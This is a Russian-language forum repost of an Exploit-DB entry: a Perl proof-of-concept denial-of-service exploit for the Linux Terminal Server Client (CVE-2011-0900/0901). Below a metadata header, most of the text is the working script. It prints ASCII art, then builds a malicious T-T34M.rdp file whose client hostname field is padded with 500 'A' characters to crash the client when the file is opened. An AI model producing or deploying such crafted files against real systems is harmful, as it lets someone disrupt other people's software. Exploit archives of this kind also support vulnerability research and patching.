Exploit Terminal Server Client - '.rdp' Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
16095
Проверка EDB
  1. Пройдено
Автор
D3V!L FUCKER
Тип уязвимости
DOS
Платформа
LINUX
CVE
cve-2011-0901 cve-2011-0900
Дата публикации
2011-02-02
Код:
#!/usr/bin/perl
# Exploit Title: [Terminal Server Client .rdp Dos ]
# Date: [2011-02-01]
# Author: [D3V!L FUCKER]
# Software Link: [sudo apt-get install tsclient] ^_^
# Version: [All Version]
# Tested on: [ubuntu 10.10]
##############################################################
#press to open then chois the T-T34M.rdp file then connect ^_^
#C0d3d By : SarBoT511 XD
print q(
  
[email protected]
               _
              | |
              | |===( )   //////
              |_|   |||  | o o|
                     ||| ( c  )                  ____
                      ||| \= /                  ||   \_
                       ||||||                   ||     |
                       ||||||                ...||__/|-"
                       ||||||             __|________|__
                         |||             |______________|
                         |||             || ||      || ||
                         |||             || ||      || ||
 ------------------------|||-------------||-||------||-||-------
                         |__>            || ||      || ||


      hit any key to continue
);
$headr1="alternate full switch:i:0
alternate shell:s:
attach to console:i:0
audiomode:i:0
auto connect:i:0
diskmapping:i:0
bitmapcachepersistenable:i:1\n";
$buffer="client hostname:s:"."A" x 500;
$headr2="compression:i:0
description:s:
desktop size id:i:1
desktopheight:i:0
desktopwidth:i:0
disable full window drag:i:0
disable menu anims:i:0
disable themes:i:0
disable wallpaper:i:0
displayconnectionbar:i:0
domain:s:
enable alternate shell:i:0
enable wm keys:i:0
full address:s:127.0.0.1
hide wm decorations:i:0
keyboard language:s:
keyboardhook:i:0
no motion events:i:0
password:b:
password 51:b:
progman group:s:
protocol:i:0
protocol file:s:
redirectcomports:i:0
redirectdrives:i:0
redirectprinters:i:0
redirectsmartcards:i:0
screen mode id:i:1
session bpp:i:0
shell working directory:s:
username:s:
winposstr:s:";
open (myfile,'>>T-T34M.rdp');
print myfile $headr1.$buffer.$headr2;
close(myfile);
 
Источник
www.exploit-db.com

Похожие темы